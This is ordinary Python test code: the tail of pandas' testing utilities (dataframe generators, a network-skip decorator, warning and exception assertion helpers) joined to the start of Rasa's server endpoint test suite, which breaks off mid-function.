cnt[label] = ndupe_l[i]
# cute Counter trick
result = list(sorted(cnt.elements(), key=keyfunc))[:nentries]
tuples.append(result)
tuples = list(zip(*tuples))
# convert tuples to index
if nentries == 1:
# we have a single level of tuples, i.e. a regular Index
index = Index(tuples[0], name=names[0])
elif nlevels == 1:
name = None if names is None else names[0]
index = Index((x[0] for x in tuples), name=name)
else:
index = MultiIndex.from_tuples(tuples, names=names)
return index
def makeCustomDataframe(
nrows,
ncols,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
nrows, ncols - number of data rows/cols
c_idx_names, idx_names - False/True/list of strings, yields No names ,
default names or uses the provided names for the levels of the
corresponding index. You can provide a single string when
c_idx_nlevels ==1.
c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
data_gen_f - a function f(row,col) which return the data value
at that position, the default generator used yields values of the form
"RxCy" based on position.
c_ndupe_l, r_ndupe_l - list of integers, determines the number
of duplicates for each label at a given level of the corresponding
index. The default `None` value produces a multiplicity of 1 across
all levels, i.e. a unique index. Will accept a partial list of length
N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
nrows/ncol, the last label might have lower multiplicity.
dtype - passed to the DataFrame constructor as is, in case you wish to
have more control in conjunction with a custom `data_gen_f`
r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a timedelta index.
if unspecified, string labels will be generated.
Examples:
# 5 row, 3 columns, default names on both, single index on both axis
>> makeCustomDataframe(5,3)
# make the data a random int between 1 and 100
>> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))
# 2-level multiindex on rows with each label duplicated
# twice on first level, default names on both axis, single
# index on both axis
>> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
# DatetimeIndex on row, index with unicode labels on columns
# no names on either axis
>> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
r_idx_type="dt",c_idx_type="u")
# 4-level multindex on rows with names provided, 2-level multindex
# on columns with default labels and default names.
>> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
r_idx_names=["FEE","FI","FO","FAM"],
c_idx_nlevels=2)
>> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
"""
assert c_idx_nlevels > 0
assert r_idx_nlevels > 0
assert r_idx_type is None or (
r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
)
assert c_idx_type is None or (
c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
)
columns = makeCustomIndex(
ncols,
nlevels=c_idx_nlevels,
prefix="C",
names=c_idx_names,
ndupe_l=c_ndupe_l,
idx_type=c_idx_type,
)
index = makeCustomIndex(
nrows,
nlevels=r_idx_nlevels,
prefix="R",
names=r_idx_names,
ndupe_l=r_ndupe_l,
idx_type=r_idx_type,
)
# by default, generate data based on location
if data_gen_f is None:
data_gen_f = lambda r, c: "R{rows}C{cols}".format(rows=r, cols=c)
data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = int(np.round((1 - density) * nrows * ncols))
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingCustomDataframe(
nrows,
ncols,
density=0.9,
random_state=None,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
Parameters
----------
Density : float, optional
Float in (0, 1) that gives the percentage of non-missing numbers in
the DataFrame.
random_state : {np.random.RandomState, int}, optional
Random number generator or random seed.
See makeCustomDataframe for descriptions of the rest of the parameters.
"""
df = makeCustomDataframe(
nrows,
ncols,
c_idx_names=c_idx_names,
r_idx_names=r_idx_names,
c_idx_nlevels=c_idx_nlevels,
r_idx_nlevels=r_idx_nlevels,
data_gen_f=data_gen_f,
c_ndupe_l=c_ndupe_l,
r_ndupe_l=r_ndupe_l,
dtype=dtype,
c_idx_type=c_idx_type,
r_idx_type=r_idx_type,
)
i, j = _create_missing_idx(nrows, ncols, density, random_state)
df.values[i, j] = np.nan
return df
def makeMissingDataframe(density=0.9, random_state=None):
df = makeDataFrame()
i, j = _create_missing_idx(*df.shape, density=density, random_state=random_state)
df.values[i, j] = np.nan
return df
class TestSubDict(dict):
def __init__(self, *args, **kwargs):
dict.__init__(self, *args, **kwargs)
def optional_args(decorator):
"""allows a decorator to take optional positional and keyword arguments.
Assumes that taking a single, callable, positional argument means that
it is decorating a function, i.e. something like this::
@my_decorator
def function(): pass
Calls decorator with decorator(f, *args, **kwargs)"""
@wraps(decorator)
def wrapper(*args, **kwargs):
def dec(f):
return decorator(f, *args, **kwargs)
is_decorating = not kwargs and len(args) == 1 and callable(args[0])
if is_decorating:
f = args[0]
args = []
return dec(f)
else:
return dec
return wrapper
# skip tests on exceptions with this message
_network_error_messages = (
# 'urlopen error timed out',
# 'timeout: timed out',
# 'socket.timeout: timed out',
"timed out",
"Server Hangup",
"HTTP Error 503: Service Unavailable",
"502: Proxy Error",
"HTTP Error 502: internal error",
"HTTP Error 502",
"HTTP Error 503",
"HTTP Error 403",
"HTTP Error 400",
"Temporary failure in name resolution",
"Name or service not known",
"Connection refused",
"certificate verify",
)
# or this e.errno/e.reason.errno
_network_errno_vals = (
101, # Network is unreachable
111, # Connection refused
110, # Connection timed out
104, # Connection reset Error
54, # Connection reset by peer
60, # urllib.error.URLError: [Errno 60] Connection timed out
)
# Both of the above shouldn't mask real issues such as 404's
# or refused connections (changed DNS).
# But some tests (test_data yahoo) contact incredibly flakey
# servers.
# and conditionally raise on these exception types
_network_error_classes = (IOError, http.client.HTTPException, TimeoutError)
def can_connect(url, error_classes=_network_error_classes):
"""Try to connect to the given url. True if succeeds, False if IOError
raised
Parameters
----------
url : basestring
The URL to try to connect to
Returns
-------
connectable : bool
Return True if no IOError (unable to connect) or URLError (bad url) was
raised
"""
try:
with urlopen(url):
pass
except error_classes:
return False
else:
return True
@optional_args
def network(
t,
url="http://www.google.com",
raise_on_error=_RAISE_NETWORK_ERROR_DEFAULT,
check_before_test=False,
error_classes=_network_error_classes,
skip_errnos=_network_errno_vals,
_skip_on_messages=_network_error_messages,
):
"""
Label a test as requiring network connection and, if an error is
encountered, only raise if it does not find a network connection.
In comparison to ``network``, this assumes an added contract to your test:
you must assert that, under normal conditions, your test will ONLY fail if
it does not have network connectivity.
You can call this in 3 ways: as a standard decorator, with keyword
arguments, or with a positional argument that is the url to check.
Parameters
----------
t : callable
The test requiring network connectivity.
url : path
The url to test via ``pandas.io.common.urlopen`` to check
for connectivity. Defaults to 'http://www.google.com'.
raise_on_error : bool
If True, never catches errors.
check_before_test : bool
If True, checks connectivity before running the test case.
error_classes : tuple or Exception
error classes to ignore. If not in ``error_classes``, raises the error.
defaults to IOError. Be careful about changing the error classes here.
skip_errnos : iterable of int
Any exception that has .errno or .reason.erno set to one
of these values will be skipped with an appropriate
message.
_skip_on_messages: iterable of string
any exception e for which one of the strings is
a substring of str(e) will be skipped with an appropriate
message. Intended to suppress errors where an errno isn't available.
Notes
-----
* ``raise_on_error`` supercedes ``check_before_test``
Returns
-------
t : callable
The decorated test ``t``, with checks for connectivity errors.
Example
-------
Tests decorated with @network will fail if it's possible to make a network
connection to another URL (defaults to google.com)::
>>> from pandas.util.testing import network
>>> from pandas.io.common import urlopen
>>> @network
... def test_network():
... with urlopen("rabbit://bonanza.com"):
... pass
Traceback
...
URLError: <urlopen error unknown url type: rabit>
You can specify alternative URLs::
>>> @network("http://www.yahoo.com")
... def test_something_with_yahoo():
... raise IOError("Failure Message")
>>> test_something_with_yahoo()
Traceback (most recent call last):
...
IOError: Failure Message
If you set check_before_test, it will check the url first and not run the
test on failure::
>>> @network("failing://url.blaher", check_before_test=True)
... def test_something():
... print("I ran!")
... raise ValueError("Failure")
>>> test_something()
Traceback (most recent call last):
...
Errors not related to networking will always be raised.
"""
from pytest import skip
t.network = True
@wraps(t)
def wrapper(*args, **kwargs):
if check_before_test and not raise_on_error:
if not can_connect(url, error_classes):
skip()
try:
return t(*args, **kwargs)
except Exception as e:
errno = getattr(e, "errno", None)
if not errno and hasattr(errno, "reason"):
errno = getattr(e.reason, "errno", None)
if errno in skip_errnos:
skip(
"Skipping test due to known errno"
" and error {error}".format(error=e)
)
try:
e_str = traceback.format_exc(e)
except Exception:
e_str = str(e)
if any(m.lower() in e_str.lower() for m in _skip_on_messages):
skip(
"Skipping test because exception "
"message is known and error {error}".format(error=e)
)
if not isinstance(e, error_classes):
raise
if raise_on_error or can_connect(url, error_classes):
raise
else:
skip(
"Skipping test due to lack of connectivity"
" and error {error}".format(error=e)
)
return wrapper
with_connectivity_check = network
def assert_raises_regex(_exception, _regexp, _callable=None, *args, **kwargs):
r"""
Check that the specified Exception is raised and that the error message
matches a given regular expression pattern. This may be a regular
expression object or a string containing a regular expression suitable
for use by `re.search()`. This is a port of the `assertRaisesRegexp`
function from unittest in Python 2.7.
.. deprecated:: 0.24.0
Use `pytest.raises` instead.
Examples
--------
>>> assert_raises_regex(ValueError, 'invalid literal for.*XYZ', int, 'XYZ')
>>> import re
>>> assert_raises_regex(ValueError, re.compile('literal'), int, 'XYZ')
If an exception of a different type is raised, it bubbles up.
>>> assert_raises_regex(TypeError, 'literal', int, 'XYZ')
Traceback (most recent call last):
...
ValueError: invalid literal for int() with base 10: 'XYZ'
>>> dct = dict()
>>> assert_raises_regex(KeyError, 'pear', dct.__getitem__, 'apple')
Traceback (most recent call last):
...
AssertionError: "pear" does not match "'apple'"
You can also use this in a with statement.
>>> with assert_raises_regex(TypeError, r'unsupported operand type\(s\)'):
... 1 + {}
>>> with assert_raises_regex(TypeError, 'banana'):
... 'apple'[0] = 'b'
Traceback (most recent call last):
...
AssertionError: "banana" does not match "'str' object does not support \
item assignment"
"""
warnings.warn(
(
"assert_raises_regex has been deprecated and will "
"be removed in the next release. Please use "
"`pytest.raises` instead."
),
FutureWarning,
stacklevel=2,
)
manager = _AssertRaisesContextmanager(exception=_exception, regexp=_regexp)
if _callable is not None:
with manager:
_callable(*args, **kwargs)
else:
return manager
class _AssertRaisesContextmanager:
"""
Context manager behind `assert_raises_regex`.
"""
def __init__(self, exception, regexp=None):
"""
Initialize an _AssertRaisesContextManager instance.
Parameters
----------
exception : class
The expected Exception class.
regexp : str, default None
The regex to compare against the Exception message.
"""
self.exception = exception
if regexp is not None and not hasattr(regexp, "search"):
regexp = re.compile(regexp, re.DOTALL)
self.regexp = regexp
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, trace_back):
expected = self.exception
if not exc_type:
exp_name = getattr(expected, "__name__", str(expected))
raise AssertionError("{name} not raised.".format(name=exp_name))
return self.exception_matches(exc_type, exc_value, trace_back)
def exception_matches(self, exc_type, exc_value, trace_back):
"""
Check that the Exception raised matches the expected Exception
and expected error message regular expression.
Parameters
----------
exc_type : class
The type of Exception raised.
exc_value : Exception
The instance of `exc_type` raised.
trace_back : stack trace object
The traceback object associated with `exc_value`.
Returns
-------
is_matched : bool
Whether or not the Exception raised matches the expected
Exception class and expected error message regular expression.
Raises
------
AssertionError : The error message provided does not match
the expected error message regular expression.
"""
if issubclass(exc_type, self.exception):
if self.regexp is not None:
val = str(exc_value)
if not self.regexp.search(val):
msg = '"{pat}" does not match "{val}"'.format(
pat=self.regexp.pattern, val=val
)
e = AssertionError(msg)
raise_with_traceback(e, trace_back)
return True
else:
# Failed, so allow Exception to bubble up.
return False
@contextmanager
def assert_produces_warning(
expected_warning=Warning,
filter_level="always",
clear=None,
check_stacklevel=True,
raise_on_extra_warnings=True,
):
"""
Context manager for running code expected to either raise a specific
warning, or not raise any warnings. Verifies that the code raises the
expected warning, and that it does not raise any other unexpected
warnings. It is basically a wrapper around ``warnings.catch_warnings``.
Parameters
----------
expected_warning : {Warning, False, None}, default Warning
The type of Exception raised. ``exception.Warning`` is the base
class for all warnings. To check that no warning is returned,
specify ``False`` or ``None``.
filter_level : str or None, default "always"
Specifies whether warnings are ignored, displayed, or turned
into errors.
Valid values are:
* "error" - turns matching warnings into exceptions
* "ignore" - discard the warning
* "always" - always emit a warning
* "default" - print the warning the first time it is generated
from each location
* "module" - print the warning the first time it is generated
from each module
* "once" - print the warning the first time it is generated
clear : str, default None
If not ``None`` then remove any previously raised warnings from
the ``__warningsregistry__`` to ensure that no warning messages are
suppressed by this context manager. If ``None`` is specified,
the ``__warningsregistry__`` keeps track of which warnings have been
shown, and does not show them again.
check_stacklevel : bool, default True
If True, displays the line that called the function containing
the warning to show were the function is called. Otherwise, the
line that implements the function is displayed.
raise_on_extra_warnings : bool, default True
Whether extra warnings not of the type `expected_warning` should
cause the test to fail.
Examples
--------
>>> import warnings
>>> with assert_produces_warning():
... warnings.warn(UserWarning())
...
>>> with assert_produces_warning(False):
... warnings.warn(RuntimeWarning())
...
Traceback (most recent call last):
...
AssertionError: Caused unexpected warning(s): ['RuntimeWarning'].
>>> with assert_produces_warning(UserWarning):
... warnings.warn(RuntimeWarning())
Traceback (most recent call last):
...
AssertionError: Did not see expected warning of class 'UserWarning'.
..warn:: This is *not* thread-safe.
"""
__tracebackhide__ = True
with warnings.catch_warnings(record=True) as w:
if clear is not None:
# make sure that we are clearing these warnings
# if they have happened before
# to guarantee that we will catch them
if not is_list_like(clear):
clear = [clear]
for m in clear:
try:
m.__warningregistry__.clear()
except Exception:
pass
saw_warning = False
warnings.simplefilter(filter_level)
yield w
extra_warnings = []
for actual_warning in w:
if expected_warning and issubclass(
actual_warning.category, expected_warning
):
saw_warning = True
if check_stacklevel and issubclass(
actual_warning.category, (FutureWarning, DeprecationWarning)
):
from inspect import getframeinfo, stack
caller = getframeinfo(stack()[2][0])
msg = (
"Warning not set with correct stacklevel. "
"File where warning is raised: {actual} != "
"{caller}. Warning message: {message}"
).format(
actual=actual_warning.filename,
caller=caller.filename,
message=actual_warning.message,
)
assert actual_warning.filename == caller.filename, msg
else:
extra_warnings.append(
(
actual_warning.category.__name__,
actual_warning.message,
actual_warning.filename,
actual_warning.lineno,
)
)
if expected_warning:
msg = "Did not see expected warning of class {name!r}.".format(
name=expected_warning.__name__
)
assert saw_warning, msg
if raise_on_extra_warnings and extra_warnings:
raise AssertionError(
"Caused unexpected warning(s): {!r}.".format(extra_warnings)
)
class RNGContext:
"""
Context manager to set the numpy random number generator speed. Returns
to the original value upon exiting the context manager.
Parameters
----------
seed : int
Seed for numpy.random.seed
Examples
--------
with RNGContext(42):
np.random.randn()
"""
def __init__(self, seed):
self.seed = seed
def __enter__(self):
self.start_state = np.random.get_state()
np.random.seed(self.seed)
def __exit__(self, exc_type, exc_value, traceback):
np.random.set_state(self.start_state)
@contextmanager
def with_csv_dialect(name, **kwargs):
"""
Context manager to temporarily register a CSV dialect for parsing CSV.
Parameters
----------
name : str
The name of the dialect.
kwargs : mapping
The parameters for the dialect.
Raises
------
ValueError : the name of the dialect conflicts with a builtin one.
See Also
--------
csv : Python's CSV library.
"""
import csv
_BUILTIN_DIALECTS = {"excel", "excel-tab", "unix"}
if name in _BUILTIN_DIALECTS:
raise ValueError("Cannot override builtin dialect.")
csv.register_dialect(name, **kwargs)
yield
csv.unregister_dialect(name)
@contextmanager
def use_numexpr(use, min_elements=None):
from pandas.core.computation import expressions as expr
if min_elements is None:
min_elements = expr._MIN_ELEMENTS
olduse = expr._USE_NUMEXPR
oldmin = expr._MIN_ELEMENTS
expr.set_use_numexpr(use)
expr._MIN_ELEMENTS = min_elements
yield
expr._MIN_ELEMENTS = oldmin
expr.set_use_numexpr(olduse)
def test_parallel(num_threads=2, kwargs_list=None):
"""Decorator to run the same function multiple times in parallel.
Parameters
----------
num_threads : int, optional
The number of times the function is run in parallel.
kwargs_list : list of dicts, optional
The list of kwargs to update original
function kwargs on different threads.
Notes
-----
This decorator does not pass the return value of the decorated function.
Original from scikit-image:
https://github.com/scikit-image/scikit-image/pull/1519
"""
assert num_threads > 0
has_kwargs_list = kwargs_list is not None
if has_kwargs_list:
assert len(kwargs_list) == num_threads
import threading
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
if has_kwargs_list:
update_kwargs = lambda i: dict(kwargs, **kwargs_list[i])
else:
update_kwargs = lambda i: kwargs
threads = []
for i in range(num_threads):
updated_kwargs = update_kwargs(i)
thread = threading.Thread(target=func, args=args, kwargs=updated_kwargs)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return inner
return wrapper
class SubclassedSeries(Series):
_metadata = ["testattr", "name"]
@property
def _constructor(self):
return SubclassedSeries
@property
def _constructor_expanddim(self):
return SubclassedDataFrame
class SubclassedDataFrame(DataFrame):
_metadata = ["testattr"]
@property
def _constructor(self):
return SubclassedDataFrame
@property
def _constructor_sliced(self):
return SubclassedSeries
class SubclassedSparseSeries(pd.SparseSeries):
_metadata = ["testattr"]
@property
def _constructor(self):
return SubclassedSparseSeries
@property
def _constructor_expanddim(self):
return SubclassedSparseDataFrame
class SubclassedSparseDataFrame(pd.SparseDataFrame):
_metadata = ["testattr"]
@property
def _constructor(self):
return SubclassedSparseDataFrame
@property
def _constructor_sliced(self):
return SubclassedSparseSeries
class SubclassedCategorical(Categorical):
@property
def _constructor(self):
return SubclassedCategorical
@contextmanager
def set_timezone(tz):
"""Context manager for temporarily setting a timezone.
Parameters
----------
tz : str
A string representing a valid timezone.
Examples
--------
>>> from datetime import datetime
>>> from dateutil.tz import tzlocal
>>> tzlocal().tzname(datetime.now())
'IST'
>>> with set_timezone('US/Eastern'):
... tzlocal().tzname(datetime.now())
...
'EDT'
"""
import os
import time
def setTZ(tz):
if tz is None:
try:
del os.environ["TZ"]
except KeyError:
pass
else:
os.environ["TZ"] = tz
time.tzset()
orig_tz = os.environ.get("TZ")
setTZ(tz)
try:
yield
finally:
setTZ(orig_tz)
def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
skipna_wrapper : function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
def convert_rows_list_to_csv_str(rows_list):
"""
Convert list of CSV rows to single CSV-formatted string for current OS.
This method is used for creating expected value of to_csv() method.
Parameters
----------
rows_list : list
The list of string. Each element represents the row of csv.
Returns
-------
expected : string
Expected output of to_csv() in current OS
"""
sep = os.linesep
expected = sep.join(rows_list) + sep
return expected
|
test_server.py | import asyncio
import json
import os
import time
import urllib.parse
import uuid
from contextlib import ExitStack
from http import HTTPStatus
from multiprocessing import Process, Manager
from multiprocessing.managers import DictProxy
from pathlib import Path
from typing import List, Text, Type, Generator, NoReturn, Dict, Optional
from unittest.mock import Mock, ANY
import pytest
import requests
from _pytest import pathlib
from _pytest.monkeypatch import MonkeyPatch
from aioresponses import aioresponses
from freezegun import freeze_time
from mock import MagicMock
from ruamel.yaml import StringIO
from sanic import Sanic
from sanic.testing import SanicASGITestClient
import rasa
import rasa.constants
import rasa.core.jobs
import rasa.nlu
import rasa.server
import rasa.shared.constants
import rasa.shared.utils.io
import rasa.utils.io
from rasa.core import utils
from rasa.core.agent import Agent, load_agent
from rasa.core.channels import (
channel,
CollectingOutputChannel,
RestInput,
SlackInput,
CallbackInput,
)
from rasa.core.channels.slack import SlackBot
from rasa.core.tracker_store import InMemoryTrackerStore
from rasa.model import unpack_model
from rasa.nlu.test import CVEvaluationResult
from rasa.shared.core import events
from rasa.shared.core.constants import (
ACTION_SESSION_START_NAME,
ACTION_LISTEN_NAME,
REQUESTED_SLOT,
SESSION_START_METADATA_SLOT,
)
from rasa.shared.core.domain import Domain, SessionConfig
from rasa.shared.core.events import (
Event,
UserUttered,
SlotSet,
BotUttered,
ActionExecuted,
SessionStarted,
)
from rasa.shared.core.trackers import DialogueStateTracker
from rasa.shared.nlu.constants import INTENT_NAME_KEY
from rasa.train import TrainingResult
from rasa.utils.endpoints import EndpointConfig
from tests.core.conftest import DEFAULT_STACK_CONFIG
from tests.nlu.utilities import ResponseTest
from tests.utilities import json_of_latest_request, latest_request
# a couple of event instances that we can use for testing
test_events = [
Event.from_parameters(
{
"event": UserUttered.type_name,
"text": "/goodbye",
"parse_data": {
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"entities": [],
},
}
),
BotUttered("Welcome!", {"test": True}),
SlotSet("cuisine", 34),
SlotSet("cuisine", "34"),
SlotSet("location", None),
SlotSet("location", [34, "34", None]),
]
# sequence of events expected at the beginning of trackers
session_start_sequence: List[Event] = [
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
ActionExecuted(ACTION_LISTEN_NAME),
]
@pytest.fixture
def rasa_app_without_api(rasa_server_without_api: Sanic) -> SanicASGITestClient:
return rasa_server_without_api.asgi_client
@pytest.fixture
def rasa_app(rasa_server: Sanic) -> SanicASGITestClient:
return rasa_server.asgi_client
@pytest.fixture
def rasa_app_nlu(rasa_nlu_server: Sanic) -> SanicASGITestClient:
return rasa_nlu_server.asgi_client
@pytest.fixture
def rasa_app_core(rasa_core_server: Sanic) -> SanicASGITestClient:
return rasa_core_server.asgi_client
@pytest.fixture
def rasa_secured_app(rasa_server_secured: Sanic) -> SanicASGITestClient:
return rasa_server_secured.asgi_client
@pytest.fixture()
async def tear_down_scheduler() -> Generator[None, None, None]:
yield None
rasa.core.jobs.__scheduler = None
async def test_root(rasa_app: SanicASGITestClient):
_, response = await rasa_app.get("/")
assert response.status == HTTPStatus.OK
assert response.text.startswith("Hello from Rasa:")
async def test_root_without_enable_api(rasa_app_without_api: SanicASGITestClient):
_, response = await rasa_app_without_api.get("/")
assert response.status == HTTPStatus.OK
assert response.text.startswith("Hello from Rasa:")
async def test_root_secured(rasa_secured_app: SanicASGITestClient):
_, response = await rasa_secured_app.get("/")
assert response.status == HTTPStatus.OK
assert response.text.startswith("Hello from Rasa:")
async def test_version(rasa_app: SanicASGITestClient):
_, response = await rasa_app.get("/version")
content = response.json()
assert response.status == HTTPStatus.OK
assert content.get("version") == rasa.__version__
assert (
content.get("minimum_compatible_version")
== rasa.constants.MINIMUM_COMPATIBLE_VERSION
)
async def test_status(rasa_app: SanicASGITestClient, trained_rasa_model: Text):
_, response = await rasa_app.get("/status")
model_file = response.json()["model_file"]
assert response.status == HTTPStatus.OK
assert "fingerprint" in response.json()
assert os.path.isfile(model_file)
assert model_file == trained_rasa_model
async def test_status_nlu_only(
rasa_app_nlu: SanicASGITestClient, trained_nlu_model: Text
):
_, response = await rasa_app_nlu.get("/status")
model_file = response.json()["model_file"]
assert response.status == HTTPStatus.OK
assert "fingerprint" in response.json()
assert "model_file" in response.json()
assert model_file == trained_nlu_model
async def test_status_secured(rasa_secured_app: SanicASGITestClient):
_, response = await rasa_secured_app.get("/status")
assert response.status == HTTPStatus.UNAUTHORIZED
async def test_status_not_ready_agent(rasa_app: SanicASGITestClient):
rasa_app.app.agent = None
_, response = await rasa_app.get("/status")
assert response.status == HTTPStatus.CONFLICT
@pytest.fixture
def shared_statuses() -> DictProxy:
return Manager().dict()
@pytest.fixture
def background_server(
shared_statuses: DictProxy, tmpdir: pathlib.Path, monkeypatch: MonkeyPatch
) -> Generator[Process, None, None]:
# Create a fake model archive which the mocked train function can return
fake_model = Path(tmpdir) / "fake_model.tar.gz"
fake_model.touch()
fake_model_path = str(fake_model)
# Fake training function which blocks until we tell it to stop blocking
# If we can send a status request while this is blocking, we can be sure that the
# actual training is also not blocking
async def mocked_training_function(*_, **__) -> TrainingResult:
# Tell the others that we are now blocking
shared_statuses["started_training"] = True
# Block until somebody tells us to not block anymore
while shared_statuses.get("stop_training") is not True:
time.sleep(1)
return TrainingResult(model=fake_model_path)
def run_server(monkeypatch: MonkeyPatch) -> NoReturn:
import sys
monkeypatch.setattr(
sys.modules["rasa.train"], "train_async", mocked_training_function,
)
from rasa import __main__
sys.argv = ["rasa", "run", "--enable-api"]
__main__.main()
server = Process(target=run_server, args=(monkeypatch,))
yield server
server.terminate()
@pytest.fixture()
def training_request(
shared_statuses: DictProxy, tmp_path: Path
) -> Generator[Process, None, None]:
def send_request() -> None:
payload = {}
project_path = Path("examples") / "formbot"
for file in [
"domain.yml",
"config.yml",
Path("data") / "rules.yml",
Path("data") / "stories.yml",
Path("data") / "nlu.yml",
]:
full_path = project_path / file
# Read in as dictionaries to avoid that keys, which are specified in
# multiple files (such as 'version'), clash.
content = rasa.shared.utils.io.read_yaml_file(full_path)
payload.update(content)
concatenated_payload_file = tmp_path / "concatenated.yml"
rasa.shared.utils.io.write_yaml(payload, concatenated_payload_file)
payload_as_yaml = concatenated_payload_file.read_text()
response = requests.post(
"http://localhost:5005/model/train",
data=payload_as_yaml,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
params={"force_training": True},
)
shared_statuses["training_result"] = response.status_code
train_request = Process(target=send_request)
yield train_request
train_request.terminate()
# Due to unknown reasons this test can not be run in pycharm, it
# results in segfaults...will skip in that case - test will still get run on CI.
# It also doesn't run on Windows because of Process-related calls and an attempt
# to start/terminate a process. We will investigate this case further later:
# https://github.com/RasaHQ/rasa/issues/6302
@pytest.mark.skipif("PYCHARM_HOSTED" in os.environ, reason="results in segfault")
@pytest.mark.skip_on_windows
def test_train_status_is_not_blocked_by_training(
background_server: Process, shared_statuses: DictProxy, training_request: Process
):
background_server.start()
def is_server_ready() -> bool:
try:
return (
requests.get("http://localhost:5005/status").status_code
== HTTPStatus.OK
)
except Exception:
return False
# wait until server is up before sending train request and status test loop
start = time.time()
while not is_server_ready() and time.time() - start < 60:
time.sleep(1)
assert is_server_ready()
training_request.start()
# Wait until the blocking training function was called
start = time.time()
while (
shared_statuses.get("started_training") is not True and time.time() - start < 60
):
time.sleep(1)
# Check if the number of currently running trainings was incremented
response = requests.get("http://localhost:5005/status")
assert response.status_code == HTTPStatus.OK
assert response.json()["num_active_training_jobs"] == 1
# Tell the blocking training function to stop
shared_statuses["stop_training"] = True
start = time.time()
while shared_statuses.get("training_result") is None and time.time() - start < 60:
time.sleep(1)
assert shared_statuses.get("training_result")
# Check that the training worked correctly
assert shared_statuses["training_result"] == HTTPStatus.OK
# Check if the number of currently running trainings was decremented
response = requests.get("http://localhost:5005/status")
assert response.status_code == HTTPStatus.OK
assert response.json()["num_active_training_jobs"] == 0
@pytest.mark.parametrize(
"response_test",
[
ResponseTest(
"/model/parse",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello ńöñàśçií",
},
payload={"text": "hello ńöñàśçií"},
),
],
)
async def test_parse(rasa_app: SanicASGITestClient, response_test: ResponseTest):
_, response = await rasa_app.post(
response_test.endpoint, json=response_test.payload
)
rjs = response.json()
assert response.status == HTTPStatus.OK
assert all(prop in rjs for prop in ["entities", "intent", "text"])
assert rjs["entities"] == response_test.expected_response["entities"]
assert rjs["text"] == response_test.expected_response["text"]
assert rjs["intent"] == response_test.expected_response["intent"]
@pytest.mark.parametrize(
"response_test",
[
ResponseTest(
"/model/parse?emulation_mode=wit",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse?emulation_mode=dialogflow",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse?emulation_mode=luis",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello ńöñàśçií",
},
payload={"text": "hello ńöñàśçií"},
),
],
)
async def test_parse_with_different_emulation_mode(
rasa_app: SanicASGITestClient, response_test: ResponseTest
):
_, response = await rasa_app.post(
response_test.endpoint, json=response_test.payload
)
assert response.status == HTTPStatus.OK
async def test_parse_without_nlu_model(rasa_app_core: SanicASGITestClient):
_, response = await rasa_app_core.post("/model/parse", json={"text": "hello"})
assert response.status == HTTPStatus.OK
rjs = response.json()
assert all(prop in rjs for prop in ["entities", "intent", "text"])
async def test_parse_on_invalid_emulation_mode(rasa_app_nlu: SanicASGITestClient):
_, response = await rasa_app_nlu.post(
"/model/parse?emulation_mode=ANYTHING", json={"text": "hello"}
)
assert response.status == HTTPStatus.BAD_REQUEST
async def test_train_stack_success_with_md(
rasa_app: SanicASGITestClient,
